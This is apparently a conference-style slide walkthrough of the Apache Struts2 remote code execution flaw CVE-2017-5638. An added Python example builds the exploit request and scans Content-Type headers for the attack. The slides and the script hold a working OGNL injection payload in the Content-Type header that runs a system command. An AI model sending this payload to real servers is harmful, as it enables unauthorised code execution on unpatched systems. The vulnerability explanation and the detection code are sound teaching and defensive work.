Apache Struts2 CVE-2017-5638

A quick walkthrough and demo of the Apache Struts2 RCE CVE-2017-5638

Published in: Technology

  1. CVE-2017-5638 Apache Struts2 Remote Code Execution
  2. About me • Riyaz Walikar • Chief Hacker @ Appsecco • null Bangalore & OWASP Bangalore chapter leader • @riyazwalikar • @wincmdfu • http://ibreak.software
  3. The vulnerability
     • Nike Zheng reported a Remote Code Execution vulnerability in Apache Struts2, tracked as CVE-2017-5638.
     • A bug in the Jakarta Multipart parser used by Apache Struts2 allows remote code execution by sending a crafted Content-Type header in the request.
     • Apache Struts2 is a web framework based on the MVC design paradigm.
  4. The request that reaches the vulnerable code path; only the Content-Type header matters:
     GET /struts-app HTTP/1.1
     Host: 127.0.0.1:8080
     User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Referer: http://127.0.0.1:8080/
     Connection: close
     Content-Type: multipart/form-data
  5. The same header carrying the OGNL payload:
     Content-Type: %{(#_='multipart/form-data').(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(@java.lang.Runtime@getRuntime().exec('calc'))}
     The first term keeps the literal string 'multipart/form-data' inside the header, so Struts still routes the request to the multipart parser; the parser rejects the malformed value, and the raw header is copied into the error message that is then evaluated as an OGNL expression.
  6. parse method in the org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest class
  7. findText > getDefaultMessage > TextParseUtil.translateVariables > evaluate, the method that evaluates the OGNL expression in the payload. OGNL: Object Graph Navigation Language.
  8. Demo
  9. Reference: https://www.immun.io/blog/will-it-pwn-cve-2017-5638-remote-code-execution-in-apache-struts-2
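As an added example (not code from the slides or from the referenced immun.io post), the following Python builds the slide 4 request with the slide 5 header and applies the check a defender would run over Content-Type values: flag OGNL expression syntax, and flag values that Struts would route to the multipart parser but that the parser would reject, which is the error path this exploit rides. The host, path and sample header values are constructed assumptions for the demo.

```python
"""Added example, not part of the slides: build the request shape from slides 4/5
and check Content-Type values for the CVE-2017-5638 pattern.  Host, path and the
sample header values below are constructed for the demo."""
import re
from typing import List, Optional, Tuple

HOST = "127.0.0.1:8080"   # assumption: the lab target shown on slide 4
PATH = "/struts-app"

# Slide 5 payload. The first term parks the literal 'multipart/form-data' in the
# header: Struts' Dispatcher only hands a request to the Jakarta multipart parser
# when the Content-Type *contains* that substring; the parser then rejects the
# value, and the raw header is copied into the error message that
# LocalizedTextUtil.findText evaluates as OGNL.
SLIDE5_PAYLOAD = ("%{(#_='multipart/form-data')."
                  "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
                  "(@java.lang.Runtime@getRuntime().exec('calc'))}")


def build_request(content_type: str, host: str = HOST, path: str = PATH) -> str:
    """Raw HTTP/1.1 request in the shape of slide 4; only Content-Type matters."""
    return ("GET {p} HTTP/1.1\r\n"
            "Host: {h}\r\n"
            "User-Agent: Mozilla/5.0\r\n"
            "Connection: close\r\n"
            "Content-Type: {c}\r\n"
            "\r\n").format(p=path, h=host, c=content_type)


def content_type_of(raw_request: str) -> Optional[str]:
    """Extract the Content-Type header value from a raw request (headers only)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "content-type":
            return value.strip()
    return None


# OGNL expression delimiters and the identifiers this exploit family relies on.
_OGNL_MARKERS = re.compile(
    r"[%$]\{|@[\w.]+@|#_memberAccess|java\.lang\.(?:Runtime|ProcessBuilder)")

# A well-formed multipart header: the media type plus optional ;name=value params.
_WELL_FORMED_MULTIPART = re.compile(
    r'^multipart/form-data(\s*;\s*[\w!#$&^.+-]+=(?:"[^"]*"|[^;\s]+))*\s*$')


def classify_content_type(value: str) -> str:
    """'ognl' if the header carries an OGNL expression, 'malformed-multipart'
    if Struts would route it to the multipart parser but the parser would
    reject it (the error path this CVE lives in), otherwise 'ok'."""
    if _OGNL_MARKERS.search(value):
        return "ognl"
    # Mirror Struts' case-sensitive contains() routing check.
    if "multipart/form-data" in value:
        if (not _WELL_FORMED_MULTIPART.match(value)
                or "boundary=" not in value.lower()):
            return "malformed-multipart"
    return "ok"


def scan(values: List[str]) -> List[Tuple[str, str]]:
    """Classify each header value and keep only the non-'ok' findings."""
    return [(v, classify_content_type(v))
            for v in values if classify_content_type(v) != "ok"]


# Constructed sample header values (not captured traffic).
SAMPLES = [
    "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "application/x-www-form-urlencoded",
    "multipart/form-data",                        # slide 4: no boundary, parser error
    SLIDE5_PAYLOAD,                               # slide 5: OGNL in the header
    "multipart/form-data; boundary=x; ${1+1}",    # alternate OGNL delimiter
]

if __name__ == "__main__":
    for value, verdict in scan(SAMPLES):
        print(f"{verdict:20s} {value[:70]}")
    print(build_request(SLIDE5_PAYLOAD))
```

Running the script lists the three sample values a reviewer should look at and prints the raw request as slide 4 would send it. The "malformed-multipart" verdict is deliberately noisy: a multipart header without a boundary is exactly what makes the Jakarta parser throw, so it is worth logging even when no OGNL markers are present.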
